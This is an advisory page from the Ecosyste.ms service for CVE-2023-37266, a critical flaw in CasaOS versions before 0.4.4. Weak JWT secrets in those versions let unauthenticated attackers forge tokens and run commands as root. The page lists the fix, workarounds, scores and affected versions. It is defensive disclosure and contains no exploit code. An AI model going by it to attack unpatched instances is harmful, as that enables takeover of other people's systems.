Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS1tNXE1LThtZnctcDJocs4AA0vD

CasaOS contains weak JWT secrets

Impact

Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as root on CasaOS instances.

Patches

The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4.

Workarounds

Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.

References

Permalink: https://github.com/advisories/GHSA-m5q5-8mfw-p2hr
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNXE1LThtZnctcDJocs4AA0vD
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 1 year ago
Updated: about 1 month ago

CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS Percentage: 0.13534
EPSS Percentile: 0.95579

Identifiers: GHSA-m5q5-8mfw-p2hr, CVE-2023-37266
References:

Repository: https://github.com/IceWhaleTech/CasaOS
Blast Radius: 0.0

Affected Packages

go:github.com/IceWhaleTech/CasaOS

Dependent packages: 4
Dependent repositories: 1
Downloads:
Affected Version Ranges: < 0.4.4
Fixed in: 0.4.4
All affected versions: 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9, 0.1.10, 0.1.11, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.2.8, 0.2.9, 0.2.10, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.3.4, 0.3.5, 0.3.6, 0.3.7, 0.3.8, 0.4.0, 0.4.1, 0.4.2, 0.4.3
All unaffected versions: 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.4.9, 0.4.10, 0.4.11, 0.4.12, 0.4.13, 0.4.14, 0.4.15